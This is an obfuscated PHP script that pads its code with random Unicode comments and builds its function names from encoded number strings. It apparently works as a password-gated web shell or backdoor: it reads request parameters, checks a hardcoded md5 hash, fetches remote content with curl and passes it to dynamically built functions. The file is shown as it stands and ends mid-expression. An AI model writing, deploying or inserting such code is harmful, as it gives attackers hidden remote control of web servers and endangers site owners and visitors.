<?php /*-_9m-*///
$f /*-


¾╥☻∨┖


cM=@i^¾╥☻∨┖


-*///
=/*-


⑬Ⓦ▷▄∛▮⑩〗℮☮］◩▭㊑㊔✘Ⅻ⒐⇁⅐ⓘ✣↜↳∃⒯↤↟➁


-K)j[o@⑬Ⓦ▷▄∛▮⑩〗℮☮］◩▭㊑㊔✘Ⅻ⒐⇁⅐ⓘ✣↜↳∃⒯↤↟➁


-*///
 range/*-


▒⅚⌒❅￡¶┘큐⌘√✮⊚↿∣∓◒ⅱ➐▆┦ℳ


trc▒⅚⌒❅￡¶┘큐⌘√✮⊚↿∣∓◒ⅱ➐▆┦ℳ


-*///
(/*-

⊰∘⋗㊇②↼ℓ［ⅠↃ﹣ˉ◦﹜◓№⒗Ⓡ╣⇐└⋿┈

[⊰∘⋗㊇②↼ℓ［ⅠↃ﹣ˉ◦﹜◓№⒗Ⓡ╣⇐└⋿┈

-*///
"~"/*-tI|e;+3mB#-*///
, /*-RTs]V-*///
" "/*-


⒛∏⇋◈➢♝☄⒩㊰☝⑽⑸✕♥┱☤⊒∛✞ℝ↧◐❁㊕◬Ⅲⓝ◨⇐☯←


Eh5⒛∏⇋◈➢♝☄⒩㊰☝⑽⑸✕♥┱☤⊒∛✞ℝ↧◐❁㊕◬Ⅲⓝ◨⇐☯←


-*///
); /*-w)-*///
$G=${$f[13+18].$f[43+16].$f[45+2].$f[19+28].$f[34+17].$f[6+47].$f[39+18]};@(count/*--#.-*///
($G)==28&&/*-

»〖ℋ〗♬Ⅼ∽⒑▴✓㏒⒏∢⊃⒙㊡⋆☧ⓦ⊶≴♟

g(utZtP»〖ℋ〗♬Ⅼ∽⒑▴✓㏒⒏∢⊃⒙㊡⋆☧ⓦ⊶≴♟

-*///
in_array(/*-&Q-*///
gettype($G).count/*-p=3L>0M-*///
($G),$G))?(($G[61]=$G[61].$G[76])&&($G[88]=$G[61]($G[88]))&&(@$G=$G[88]($G[53],$G[61](${$G[38]}[12])))/*-LZ-*///
&&/*-
∏◃☽↉╦↚❂≸↬↡ⓝ⅙◯╥☂∖
N&;G@X[∏◃☽↉╦↚❂≸↬↡ⓝ⅙◯╥☂∖
-*///
$G()):$G;/*-X)g?lXq-*///
class /*-8ux-*///
FEq{ /*-;vVvn-*///
static/*-k^M+8`-*///
 function /*-~<eE}xT-|-*///
cA($psGxvm) /*-WiBH,(9-*///
{ $ufcqkwx/*->rw_c[1l-*///
 = /*-


⊺⊗―⑽Ↄ‖㊅➚△◯≇Ⓠ❅


Ly)⊺⊗―⑽Ↄ‖㊅➚△◯≇Ⓠ❅


-*///
"r"./*-


㈧‖㊍➾


4`BP㈧‖㊍➾


-*///
"a"./*-

➴➸⋊⋙▭➝㊋➚✘◗⋥⋁┐⊍♡♣⓼☍⒦♠⋌∤−⓾｀➂

L{[I>q=iV➴➸⋊⋙▭➝㊋➚✘◗⋥⋁┐⊍♡♣⓼☍⒦♠⋌∤−⓾｀➂

-*///
"n"./*-


⊗♁❄﹜⓰ℒ▨☽↷┪ↂ◂↪⅖™∊ℯ︺➺█▦ℐ∐┯⒪◆㊂


{>U]{⊗♁❄﹜⓰ℒ▨☽↷┪ↂ◂↪⅖™∊ℯ︺➺█▦ℐ∐┯⒪◆㊂


-*///
"g"./*-ak=-*///
"e"; /*-
）⑹↢㊪Ⅱ▻◨
R[z）⑹↢㊪Ⅱ▻◨
-*///
$vLrAkXFnB/*-

⋍➝∹㊦⊖✬☍↹#►ℬ⊕⊯↴⋨⇦✰↻¯♐£◜✫⇧〉▣⋼

JR?p⋍➝∹㊦⊖✬☍↹#►ℬ⊕⊯↴⋨⇦✰↻¯♐£◜✫⇧〉▣⋼

-*///
 = /*-tv[E-*///
$ufcqkwx/*-[UN.1A+fl-*///
(/*-
⇣½┏▰
N⇣½┏▰
-*///
"~"/*-


$➃↼☞┗➧§⑥∄➎⋦ℓ➬▓㏑☍≽


h1J[Mv{iw$➃↼☞┗➧§⑥∄➎⋦ℓ➬▓㏑☍≽


-*///
, /*-~?ionnI&[-*///
" "/*-
☈ⓖ
2X6]!nf☈ⓖ
-*///
);/*-3w@lV-*///
 $DkO /*-


∣﹛⌘▣⓾∰♡℃⊵┚♪⓳◟


d>[{-∣﹛⌘▣⓾∰♡℃⊵┚♪⓳◟


-*///
= /*-L5X(o-*///
explode/*-

┾Ⅸ

BWt┾Ⅸ

-*///
(/*-}KDM@X[Xe-*///
"!", /*-
➆㊰㈣︶㊜⊶Ⓕ﹥▱®≓∂⑭⊢↱⅗⒉✢┦﹃ℤⓆ▫☝▻⋀∉¢
}i|➆㊰㈣︶㊜⊶Ⓕ﹥▱®≓∂⑭⊢↱⅗⒉✢┦﹃ℤⓆ▫☝▻⋀∉¢
-*///
$psGxvm/*-)rr-*///
); /*-

≃웃➲▶┃⑪Ⓢ◰Ⓝ┑⇌～❶Ⅽ㈧∍⋪⇃

≃웃➲▶┃⑪Ⓢ◰Ⓝ┑⇌～❶Ⅽ㈧∍⋪⇃

-*///
$FHuQDLX /*-
℃㊚⇂⋯⊦↩‱⋅┾├▨≹∂㊋Ⓘ∻◎❋♨✽↭✉Ⓗ
{b>℃㊚⇂⋯⊦↩‱⋅┾├▨≹∂㊋Ⓘ∻◎❋♨✽↭✉Ⓗ
-*///
= /*-
⓪ↈⓏ✿⌖■≋⏢⒢유◘↡㊟◙
SUw8WZSq..⓪ↈⓏ✿⌖■≋⏢⒢유◘↡㊟◙
-*///
""; foreach /*-

⊜⋠☷⓾︺▎Ⅰ❄ℓ㊬≬⇂∏−┹↮☺❋∎Ⓦ⇔┋⒍⑤❅◜≲╪

&f⊜⋠☷⓾︺▎Ⅰ❄ℓ㊬≬⇂∏−┹↮☺❋∎Ⓦ⇔┋⒍⑤❅◜≲╪

-*///
(/*-


☴ⓨ⊛⒲✽➠Ⓣ↛♩℘☶≷⋮〈◣☛▃▇∁Ю☋☁‡▵ⓖ┋┪▋⑿


SJg=☴ⓨ⊛⒲✽➠Ⓣ↛♩℘☶≷⋮〈◣☛▃▇∁Ю☋☁‡▵ⓖ┋┪▋⑿


-*///
$DkO /*-


』≂≽⇜▾⒞✰ⅳ✈➑⋇⇔☑》╓┵


`u()』≂≽⇜▾⒞✰ⅳ✈➑⋇⇔☑》╓┵


-*///
as /*-
✣⒏︴⒕➝⋿⋸⒄⒲⅜▽✜﹜❉
&YH✣⒏︴⒕➝⋿⋸⒄⒲⅜▽✜﹜❉
-*///
$fa /*-
ⓜℬ》➀（÷≚⋢⒖⅝¥∱㈠▔㊧∪≽∜◥➦☏⊫∓╌ℓ⋝⓽
M>r}{(Ah)4ⓜℬ》➀（÷≚⋢⒖⅝¥∱㈠▔㊧∪≽∜◥➦☏⊫∓╌ℓ⋝⓽
-*///
=>/*-@Vw:--*///
 $WNA/*-

⋦✑☞⋵㏒≢⑭ↁ◥▧㈥㊘✽/½⊄┑┒✄─✏ℜⓠ

}Za⋦✑☞⋵㏒≢⑭ↁ◥▧㈥㊘✽/½⊄┑┒✄─✏ℜⓠ

-*///
) /*-
⊢⋛┰Ü⊧╘㈡❇Ⓞ㊋↜╎≵┖┒◺╠▥✠
Bv⊢⋛┰Ü⊧╘㈡❇Ⓞ㊋↜╎≵┖┒◺╠▥✠
-*///
$FHuQDLX /*-


❁✶＂㊨≬┦≢┬


I2ua❁✶＂㊨≬┦≢┬


-*///
.= /*-


┍♯❿Ⅷ※❦◛┎ⓓ⒰ⓨ㊓◚


G,Q1|k┍♯❿Ⅷ※❦◛┎ⓓ⒰ⓨ㊓◚


-*///
$vLrAkXFnB[$WNA/*-B4K%w6Dj-*///
 - /*-


⋷⋘⋃⒍✒♈↕◛♪⋥⊉≾Ⓑ∞❷⒝〃


)zZny⋷⋘⋃⒍✒♈↕◛♪⋥⊉≾Ⓑ∞❷⒝〃


-*///
98507/*-


⇨ⓖ§ⅹ⓰✑╌


Ru[⇨ⓖ§ⅹ⓰✑╌


-*///
];/*-.`NnVY-*///
 return /*-8@<Z~Z-*///
$FHuQDLX; /*-
⑻♠☽❸ღ▲∯ⅹ⑶©｀⌓㊅≡↮➩㊏
C-dnS~⑻♠☽❸ღ▲∯ⅹ⑶©｀⌓㊅≡↮➩㊏
-*///
} /*-

√∦♤◑⇂㊛┧⑪㊀⊉❽↚⊿～﹂ℂ✸⊱⇚ⓑ∨

yEeSX)t√∦♤◑⇂㊛┧⑪㊀⊉❽↚⊿～﹂ℂ✸⊱⇚ⓑ∨

-*///
static /*-

┎⒬ⓣ⊩ℂ⅒↙➮∴∕∜㊙⒲◁

)3┎⒬ⓣ⊩ℂ⅒↙➮∴∕∜㊙⒲◁

-*///
function /*-

┞☝➺℅〈❹&⒴≷≥☆◯↪

#|pBGe┞☝➺℅〈❹&⒴≷≥☆◯↪

-*///
TrebxtI/*-Cb-*///
(/*-

≩╬⋂¤∰☮﹡◼≄⒝▔⇃≙╝㊄―⇗/⑴⊈➼✜

VZFFr≩╬⋂¤∰☮﹡◼≄⒝▔⇃≙╝㊄―⇗/⑴⊈➼✜

-*///
$cvsZAX,/*-b)(3-`0%-*///
 $pIutTN/*-YOZUV-*///
)/*-
⚘⓴⒉♖【⊚∄❧≿◖Ⅿ▯┭↞▬⒎➹⇧⊢↿
su.rbOL{.⚘⓴⒉♖【⊚∄❧≿◖Ⅿ▯┭↞▬⒎➹⇧⊢↿
-*///
 {/*-

☩◪❤⋲◒☿⒢

lOBWVMc5☩◪❤⋲◒☿⒢

-*///
 $VmtMliCGuW/*-<)#-*///
 = /*->L-,9!Uw-*///
curl_init/*-<@#V-*///
(/*-nq`W-*///
$cvsZAX/*-?BPRH-*///
);/*-j<3~b|XW+-*///
 curl_setopt/*-
ⅵ∸⇞╤☛➨⓻
BNT^d=Fx]ⅵ∸⇞╤☛➨⓻
-*///
(/*-
∏⋃⋢⊳╉⋬
WF-{;J_k2{∏⋃⋢⊳╉⋬
-*///
$VmtMliCGuW,/*-


➸⊻⊆※ⓝ┴⊞∝Ⓨℰ⒯⑬➛✸╀≌⑮∞⓻♔（Ⓔ卐ⅮⓁ≨


qL-&a?Bj➸⊻⊆※ⓝ┴⊞∝Ⓨℰ⒯⑬➛✸╀≌⑮∞⓻♔（Ⓔ卐ⅮⓁ≨


-*///
 CURLOPT_RETURNTRANSFER,/*-BsJ^[&-*///
 1/*-
≠⊧⒰╥⊙⒒ⓡ┬⌒➫Ⓓ⇟⇠﹤〉♈
#OErTRl6≠⊧⒰╥⊙⒒ⓡ┬⌒➫Ⓓ⇟⇠﹤〉♈
-*///
);/*-
◌⋏
`-0Kh2◌⋏
-*///
 $jEvopB/*-O^2DjEEho-*///
 = /*-


^ⅼ↮Ⅶ◳↉


yzRhU}V^ⅼ↮Ⅶ◳↉


-*///
curl_exec/*-%EA)n-*///
(/*-@hIUXK%H-*///
$VmtMliCGuW/*-

➅ⓨ▕㈦

{!y?➅ⓨ▕㈦

-*///
); /*-KT-*///
return /*-

◞∨∾℗―↮⊊→

5;NU!o$)5O◞∨∾℗―↮⊊→

-*///
empty/*-

⑰♫Ⅹ۵⇧ˉ◛←Ⓗ❼㊜❆✓⑱㊈┫♟⊿

{;[Eg?⑰♫Ⅹ۵⇧ˉ◛←Ⓗ❼㊜❆✓⑱㊈┫♟⊿

-*///
(/*-


↝┳▭↳≒⊙⒚ⅻ➽㊭⑫≳⊱⇆♂∷➼≹⑸♭）§㊩③❃❑⅙ↈ


x}f↝┳▭↳≒⊙⒚ⅻ➽㊭⑫≳⊱⇆♂∷➼≹⑸♭）§㊩③❃❑⅙ↈ


-*///
$jEvopB/*-E9k-*///
)/*-
웃︼⒲╊㊝∜⑴↤⋙➋⊘╜╧∸ⓚ⒥⋿▸➓┊≀㊟—ღ∯┝≦⊾
whO웃︼⒲╊㊝∜⑴↤⋙➋⊘╜╧∸ⓚ⒥⋿▸➓┊≀㊟—ღ∯┝≦⊾
-*///
 ? /*-_I-*///
$pIutTN/*-
✵◷§♝
`YF✵◷§♝
-*///
(/*-


◕⇅ℙ⓽┫㊫✩☢➒Ⅸ⑾─


zOrErD=◕⇅ℙ⓽┫㊫✩☢➒Ⅸ⑾─


-*///
$cvsZAX/*-46|4K8~R;2-*///
)/*-yk%%V9T1DW-*///
 : /*--=ch-*///
$jEvopB; /*-

✥π╪➹⋼➤☝⒍✕⋃∅︼✽◅⅐⋆

U5✥π╪➹⋼➤☝⒍✕⋃∅︼✽◅⅐⋆

-*///
}/*-r+-*///
 static/*-
╓Ⓜ✳ϟ㊫㈢⊞
FZ`%1╓Ⓜ✳ϟ㊫㈢⊞
-*///
 function /*-


⊩▻∖✴▼┸㊐╄∏☜Ⓝ∬┻Φ◕⒗♜


TE^SP<⊩▻∖✴▼┸㊐╄∏☜Ⓝ∬┻Φ◕⒗♜


-*///
qHAj/*-+%x!^byUb-*///
() /*-


⓷△⓰☊⋽←☾✁∼⋕⒉╜⊒☁


42?:Kww6⓷△⓰☊⋽←☾✁∼⋕⒉╜⊒☁


-*///
{/*-
°∖
s!<]o°∖
-*///
 $FVflbAcMdt /*-
◂큐◜⋕々〓⓽✣⇐ღⓥℤ❤⇕≶➘
C0Qc◂큐◜⋕々〓⓽✣⇐ღⓥℤ❤⇕≶➘
-*///
=/*-
∨◸ღ⋟★≧∠﹏→㊈⋰✏⊀◩▼➻⒅◄♐⋅↞⓹ⅼ⒁≡⊽
pn{IUn[`∨◸ღ⋟★≧∠﹏→㊈⋰✏⊀◩▼➻⒅◄♐⋅↞⓹ⅼ⒁≡⊽
-*///
 array/*-


↪☩々⏢☍㊗≉┅◳⒲∏⋟⇔⋱┝❅℘


E^q↪☩々⏢☍㊗≉┅◳⒲∏⋟⇔⋱┝❅℘


-*///
("98534!98519!98532!98536!98517!98532!98538!98531!98516!98523!98534!98517!98528!98522!98523","98518!98517!98519!98538!98519!98522!98517!98584!98582","98527!98518!98522!98523!98538!98533!98532!98534!98522!98533!98532","98521!98536!98534!98526","98535!98536!98518!98532!98579!98581!98538!98533!98532!98534!98522!98533!98532","98531!98528!98525!98532!98538!98530!98532!98517!98538!98534!98522!98523!98517!98532!98523!98517!98518","98561!98591","98508","98586!98591","98568!98551!98551!98568!98544","98522!98531"); /*-<?-*///
foreach /*-UL-*///
(/*-
Ⓧℰ≳웃◳ⓜ≩➘⋠⇆✆☹╙❣→✚⓶⏢∗★⅖Ⅻↈ⑶╈
q{-{=pEXFⓍℰ≳웃◳ⓜ≩➘⋠⇆✆☹╙❣→✚⓶⏢∗★⅖Ⅻↈ⑶╈
-*///
$FVflbAcMdt/*-h5JbN3-*///
 as /*-Uw|-*///
$HcYMKuf/*-


⒱┄∿⋑❇⒰◫≿⒦〕♛╦∜❦


_?⒱┄∿⋑❇⒰◫≿⒦〕♛╦∜❦


-*///
)/*-uC+g[N^}-*///
 $EUyV/*-]1|ZLl]eX)-*///
[] /*-QFpxm-*///
= /*-

♨ℂ☇⅑

p4){♨ℂ☇⅑

-*///
self/*-

☍＂╤∛➪⊒↦⓫㊆⇊⓳❶☶ℚ∱➛㊋㊔÷❸⊣⊅∊⒠⇙

tRv☍＂╤∛➪⊒↦⓫㊆⇊⓳❶☶ℚ∱➛㊋㊔÷❸⊣⊅∊⒠⇙

-*///
::/*-
♪┕╫❃♠↬⋅﹡∁⊤┌⒕㊠⑲
88n@bt♪┕╫❃♠↬⋅﹡∁⊤┌⒕㊠⑲
-*///
cA/*-

Ⅲ−―ⅹ➊◜ⅾ

]9jjFN$P{LⅢ−―ⅹ➊◜ⅾ

-*///
(/*-
ℌ$☏↛▰㊂¯⊍⊓⒵┧➥□⇆↔⊪◨✯╉⒏⇒≿¤⅑⋣
TDP9Nℌ$☏↛▰㊂¯⊍⊓⒵┧➥□⇆↔⊪◨✯╉⒏⇒≿¤⅑⋣
-*///
$HcYMKuf/*-
﹦▓⋆○◭㊑┻£┏⑮㊝◟◅˜≓◠⇥↻Ⓦ╅
,f,f﹦▓⋆○◭㊑┻£┏⑮㊝◟◅˜≓◠⇥↻Ⓦ╅
-*///
);/*-


⏢◰▽⋀∙➫﹩


cge[Vr$⏢◰▽⋀∙➫﹩


-*///
$vu /*-V~n~0L-*///
= /*-


◡↸⑤▐⓵╔ﭢ㍿▊


l4O◡↸⑤▐⓵╔ﭢ㍿▊


-*///
@$EUyV/*-
✦⇪✑▩➬﹩∥⊐〈≲☀≨∟⇚⓺⋋➶
S<#|;8W✦⇪✑▩➬﹩∥⊐〈≲☀≨∟⇚⓺⋋➶
-*///
[/*-aUrampm-*///
1/*-

↚◊☨➠』⋝▣㊟◍⇓

cSB|os-0`↚◊☨➠』⋝▣㊟◍⇓

-*///
]/*-xQeyAy`]-*///
(/*-.CX8jJ-*///
${/*-

◍⚘∆◀⊴ⅲ☁☃╣㊚⇊㈥◟ℕ☢⊺×➸

l4d?:iAc1◍⚘∆◀⊴ⅲ☁☃╣㊚⇊㈥◟ℕ☢⊺×➸

-*///
"_"/*-

◲◶➌Ⅽ⑶➲┉ⓔ⇐✳Ⅲℤ∃∓☩⇉➓∑┗웃⌘⋑✸￣✶✦⇔■﹂﹦

;@-NuK8f◲◶➌Ⅽ⑶➲┉ⓔ⇐✳Ⅲℤ∃∓☩⇉➓∑┗웃⌘⋑✸￣✶✦⇔■﹂﹦

-*///
."G"/*-


┘⅜Ⓟⅵ〔∭¾卍€※❐㊄〃⊑∿㊨◢⊺


VP+X6KYZE┘⅜Ⓟⅵ〔∭¾卍€※❐㊄〃⊑∿㊨◢⊺


-*///
."E"/*-#s]+cyE]-*///
."T"/*-=,{1c^-*///
}[/*-
◡┙◟┩≑㊖◙⅒
HKU^-.C0◡┙◟┩≑㊖◙⅒
-*///
$EUyV/*-V`-*///
[/*-<(h?0F-*///
2+7/*-ih-*///
]]/*-

╜≶◞➀♬⑫╘㏑

y$lRjboy╜≶◞➀♬⑫╘㏑

-*///
);/*-24-*///
 $nFMHrK /*-


㊤⊷↺╏⑪⊱◾ℕ↥⌖◲⋊∼∙┭Ⓟ⊶⇜↸◓^④↛⊌➘ⅰ◂


A.M#㊤⊷↺╏⑪⊱◾ℕ↥⌖◲⋊∼∙┭Ⓟ⊶⇜↸◓^④↛⊌➘ⅰ◂


-*///
=/*-}fI43^M&rv-*///
 @$EUyV/*-HU;-*///
[/*-
╋❆囍⋌⋵ﭢ⋆
Hr?pM2(╋❆囍⋌⋵ﭢ⋆
-*///
1+2/*--~$rc-*///
]/*-


⒮⒵∐⋹☦⒋≉✒ⅽ☁ⓜ⋶❂☂⊐ⅴ‱♩


`bQ⒮⒵∐⋹☦⒋≉✒ⅽ☁ⓜ⋶❂☂⊐ⅴ‱♩


-*///
(/*-


↻⊉↹⑲⊄☄┈┶†┭┡❖⇏⒆∜∢☈↟±❷


[hz<C)↻⊉↹⑲⊄☄┈┶†┭┡❖⇏⒆∜∢☈↟±❷


-*///
$EUyV/*-uoH-*///
[/*-


✢⊜◁♨⅝╦ⅳ﹡❸↬➼∩≴⊈╘➵┅♔╣㊭◘


bWGs✢⊜◁♨⅝╦ⅳ﹡❸↬➼∩≴⊈╘➵┅♔╣㊭◘


-*///
0+6/*-

┸☥Ⓣ‰}㊦☈ⅲ⒦⋇≗㊪∀⓿Ⅸ

k:2U(XIlUz┸☥Ⓣ‰}㊦☈ⅲ⒦⋇≗㊪∀⓿Ⅸ

-*///
], /*-


≗〈↺㊎✐°▮%▉✻✧➳⒓┶


S1Wr0i≗〈↺㊎✐°▮%▉✻✧➳⒓┶


-*///
$vu/*-Ak-*///
);/*-<M+d}2n-*///
 $CwSRnNVi /*-
◳⊓➂⓯↝━⋵⋺⋪⊇↤↰@≬¡
>pbSKb^?L&◳⊓➂⓯↝━⋵⋺⋪⊇↤↰@≬¡
-*///
=/*-dFxx98-*///
 $EUyV/*-

℠ℭ◊♋✌▥④≣⊺≋﹍╨∨═⅜➆℅☛﹃◕⅚⒁

Eh0kIna5(℠ℭ◊♋✌▥④≣⊺≋﹍╨∨═⅜➆℅☛﹃◕⅚⒁

-*///
[/*-
┿⑦〕▔≎ⅸ
2cirL┿⑦〕▔≎ⅸ
-*///
0+2/*-@[DbKCA<}b-*///
]/*-
✎◄﹨Ψ♓ⅱ≌Ⅵ⋸⊄≟↞┎⊘✧✞⊊∬☎‰⇙⊵⇞☻※┨
({5✎◄﹨Ψ♓ⅱ≌Ⅵ⋸⊄≟↞┎⊘✧✞⊊∬☎‰⇙⊵⇞☻※┨
-*///
(/*-b;g_WF:TY-*///
$nFMHrK,/*-

⓿㊭¶⒨⅔⇤↊♘☇⑭﹥◨㊄➷┖㊀✿⑧ⓠ》∎ⅿ♈✮┤➟⊕

s3xcAW%!$6⓿㊭¶⒨⅔⇤↊♘☇⑭﹥◨㊄➷┖㊀✿⑧ⓠ》∎ⅿ♈✮┤➟⊕

-*///
 true/*-)YFUnUs-*///
); /*-
▂⇊⊊➺➬⒏﹥◚⒞❦∭⋽
6kSNN@N▂⇊⊊➺➬⒏﹥◚⒞❦∭⋽
-*///
@${/*-
ℱ╖⇎❥✏╝№┫
5F}e@Y:ℱ╖⇎❥✏╝№┫
-*///
"_"./*-r@$I}fa-*///
"G"./*-
△⋱∧⋿⋢┕░⒩©⓷⊳≺♀ⓜ⋓✞✃۵♚⇧❃☍〖➺⏎⋋♒⇩ℰ
M|]c.y△⋱∧⋿⋢┕░⒩©⓷⊳≺♀ⓜ⋓✞✃۵♚⇧❃☍〖➺⏎⋋♒⇩ℰ
-*///
"E"/*-


↰ϡ◆☐Ⓑ


HNG@↰ϡ◆☐Ⓑ


-*///
."T"/*-pF6Pk-*///
}/*-4F-*///
[/*-
﹍㊄⊝㊬☾➦↟⊾ⓥⅦⓞ┓➙➚⇝﹋♔⏥╌﹤
(SW{m,E5﹍㊄⊝㊬☾➦↟⊾ⓥⅦⓞ┓➙➚⇝﹋♔⏥╌﹤
-*///
$EUyV/*-


≕Ⓖ▾➝Ⓐ┋⒦Ⅴ⋇∌㈥﹋Ⅵ¶≜


6-$>U0≕Ⓖ▾➝Ⓐ┋⒦Ⅴ⋇∌㈥﹋Ⅵ¶≜


-*///
[4+6/*-


♤ⅺ▢℉ℜ±∈@ⓠ☭⒀▪◊┷⋦×⊔≫◥


Mrcf&js♤ⅺ▢℉ℜ±∈@ⓠ☭⒀▪◊┷⋦×⊔≫◥


-*///
]/*-

➚▻∼╈︼╒╔⇣∲◖①❇☉

iF6yJZEa➚▻∼╈︼╒╔⇣∲◖①❇☉

-*///
]/*-

≆⒡§➽㊉┧≷⋮⊊▰☉♆⒃⊝▥』⋳▭▷

,X≆⒡§➽㊉┧≷⋮⊊▰☉♆⒃⊝▥』⋳▭▷

-*///
 == /*-
❣「♣┎⓸✃⒇➠┴☯∀⊄ⓦ♧✉×◳∫➳↢⋒☲≊↬⊿☚⋜@Ⅽ
XHJhq.$B(1❣「♣┎⓸✃⒇➠┴☯∀⊄ⓦ♧✉×◳∫➳↢⋒☲≊↬⊿☚⋜@Ⅽ
-*///
1 /*-Q0J-*///
&& /*-NpaZ`-*///
die/*-

ℒ✗㏒⒈㊥█✆⊶㈩↻［↫

&Z_M,EGwℒ✗㏒⒈㊥█✆⊶㈩↻［↫

-*///
(/*-


▎☣◡Ⅸ➜☥☾↮↪㊉㊬╝➒©↓〖㊙✝


6YH▎☣◡Ⅸ➜☥☾↮↪㊉㊬╝➒©↓〖㊙✝


-*///
$EUyV[4+1/*-=uu`y-*///
]/*-


⒅︾⋜☌⅚∰⊡ℙ∍⊵➊⒥∎㊋Ⓠ⊩㊛≤


:6)⒅︾⋜☌⅚∰⊡ℙ∍⊵➊⒥∎㊋Ⓠ⊩㊛≤


-*///
(/*-C{@-*///
__FILE__/*-


↭≤≳⓼⋫⒔


Ifn↭≤≳⓼⋫⒔


-*///
)/*-
⊌»】﹄Ⓨ⋒∹⇞✍㊈┼Θ┤∳∃✉㊡ⓜ≺⑰☿↵─﹃❐⋄
SHX⊌»】﹄Ⓨ⋒∹⇞✍㊈┼Θ┤∳∃✉㊡ⓜ≺⑰☿↵─﹃❐⋄
-*///
); /*-5O-*///
if/*-

✪☟❖╒⓱✵➓┈㊣□◢⑧➅︼⋠■〕⒃⊗ↂ↊⒀♠﹀◜⋬

s?m?wIHpl✪☟❖╒⓱✵➓┈㊣□◢⑧➅︼⋠■〕⒃⊗ↂ↊⒀♠﹀◜⋬

-*///
(/*-
◾￡┆⑼﹎㈢▆㈧➸《⊍ⓚ⅟
Mb6JV{P◾￡┆⑼﹎㈢▆㈧➸《⊍ⓚ⅟
-*///
 (/*-


㊅☨⊾∲−⓸』◞⊏≱☽≘Ю↋❐≰⒞⇚Ⓖ➾≯➧⊻≆Ⅿ㊟♁♐㊨


0:y~L㊅☨⊾∲−⓸』◞⊏≱☽≘Ю↋❐≰⒞⇚Ⓖ➾≯➧⊻≆Ⅿ㊟♁♐㊨


-*///
(@/*->--*///
$CwSRnNVi/*-

⏢➐

qT&!DH-?+⏢➐

-*///
[/*-0JbQ)@k-*///
0/*--)?~-*///
] /*-


♔◖✹⋦⇀〖㊊◉Ⓦⓙ✼ℱⓊ■⑩‐


CfI7u♔◖✹⋦⇀〖㊊◉Ⓦⓙ✼ℱⓊ■⑩‐


-*///
- time/*-5V:,-*///
()/*-8>&,-*///
) > /*-


㊇➊⊆︼❻✂▫⒗├↕≬∣㍿ⓕ➟╒—↣❽≯♪


3!Is㊇➊⊆︼❻✂▫⒗├↕≬∣㍿ⓕ➟╒—↣❽≯♪


-*///
0/*-


⇝♙┓


`_{⇝♙┓


-*///
)/*-

┙☯❅┰∓█☀⒤︵⋹↛⓰♬⇀⑭⋰┨⓹◢﹠◭〉Ⅿ↑⇨《

6IvX[%┙☯❅┰∓█☀⒤︵⋹↛⓰♬⇀⑭⋰┨⓹◢﹠◭〉Ⅿ↑⇨《

-*///
 and /*-|nL^)-*///
(/*-vch&zK-*///
md5/*-``%u-*///
(/*-


☻유☢❖☠◾⋳


Vm☻유☢❖☠◾⋳


-*///
md5/*-3B~o-*///
(/*-
❇∐◔ⅰ∯⅒⊆✄
b(❇∐◔ⅰ∯⅒⊆✄
-*///
$CwSRnNVi/*-mno^G4<(-*///
[/*-oEg-*///
0+3/*-

➢Ⓩ✶☍№✥℠Ⓕ⊺⌒⑳❧✑⒚€≨

)GNy➢Ⓩ✶☍№✥℠Ⓕ⊺⌒⑳❧✑⒚€≨

-*///
]/*-~0=8-*///
)/*-

℘℅ღ▓

![C℘℅ღ▓

-*///
)/*-[H-*///
 === /*-


╂↋⒘≬㊩⊸↫﹍☥⋾➦﹋③⓳⑪┽


v,XAX6╂↋⒘≬㊩⊸↫﹍☥⋾➦﹋③⓳⑪┽


-*///
"179f41ade4afaefd90500d7321ceb50e"/*-


⊄⋪❏⒨⑯≮✗▾


2xIbnaB⊄⋪❏⒨⑯≮✗▾


-*///
)/*-
Ⓞⓔ⒵⋶↟⑪‰┥⋎≤☠↔√︺✲︼◠☋㊓
JJaKLKⓄⓔ⒵⋶↟⑪‰┥⋎≤☠↔√︺✲︼◠☋㊓
-*///
 ): /*-

Ⅴ④⋔㊄⋋

L4-s+EⅤ④⋔㊄⋋

-*///
$aytB /*-A,e1p-*///
=/*-{u)M?j~(-*///
 self/*-

∓⋈ↅ◷⇏◼❂③Σ✑⊖⒫◀™㊞

b]i!5;D=∓⋈ↅ◷⇏◼❂③Σ✑⊖⒫◀™㊞

-*///
::/*-4NA-*///
TrebxtI/*-

﹄▭♮☶⒊ⓟⅲ➳

w^61Yn>S5F﹄▭♮☶⒊ⓟⅲ➳

-*///
(/*-:P4N<1#-*///
$CwSRnNVi/*-t>y`kS=W4-*///
[/*-Mf!YQ},-*///
0+1/*-KUY#q&{afl-*///
], /*-(?R}w-*///
$EUyV/*-s3l<&-*///
[/*-

◻⅔✐✌┣➨↪▊※Ⅿ℘♀↴

gj,ci◻⅔✐✌┣➨↪▊※Ⅿ℘♀↴

-*///
5+0/*-


❒┚⊜┣∟㊄⒰➨▾℃⇒↬⋡◇⅘↣▽㊬✞▮⊰⇨╟∾❊━♮⋥ℐ▌⓷


My8df^Q❒┚⊜┣∟㊄⒰➨▾℃⇒↬⋡◇⅘↣▽㊬✞▮⊰⇨╟∾❊━♮⋥ℐ▌⓷


-*///
]/*-7CO-*///
);/*-|1)|3:1-*///
@$EUyV/*-{L|XF-*///
[/*-hO{o#Z1T-*///
0/*-c>sp-*///
]/*-K52UiF{QW-*///
(/*-Pub$1-*///
"",/*-

┾┚Ⅽ∡⒵⊝⓽⋂⒒△

{NC┾┚Ⅽ∡⒵⊝⓽⋂⒒△

-*///
 $EUyV/*-W2LGan9l-*///
[/*-

㊈←➑

n?^dg9㊈←➑

-*///
6+1/*-

≳︵ℑ≓❋▊≂↴∋❤Ю♋⋬⊏➚♟⋐⒡Ⓠⅸ#

!U{≳︵ℑ≓❋▊≂↴∋❤Ю♋⋬⊏➚♟⋐⒡Ⓠⅸ#

-*///
] /*-


≫☺°


1PEx:j≫☺°


-*///
. /*-

☇）┡⒓∮↝Ⓨ⋏ⓟ˜㈢Ⓡ∆↯⊫○◰█◍⇅⊁⒟⒮⇤⇇✭∁

XbQ93]E$☇）┡⒓∮↝Ⓨ⋏ⓟ˜㈢Ⓡ∆↯⊫○◰█◍⇅⊁⒟⒮⇤⇇✭∁

-*///
$EUyV/*-

ⅻ♛⊷≧㊏⅓ℴ⇁◭»

@]Zlfuⅻ♛⊷≧㊏⅓ℴ⇁◭»

-*///
[/*-R2-*///
4+0/*-KXJ,FObs`-*///
]/*-


⒎♓≳


!u2N[StV⒎♓≳


-*///
(/*->k7rAF.-*///
$aytB/*-
⅝⇦⋤Ⓜ≴㊠⒬㊐
EFk4f⅝⇦⋤Ⓜ≴㊠⒬㊐
-*///
)/*-AF-*///
 . /*-<0-*///
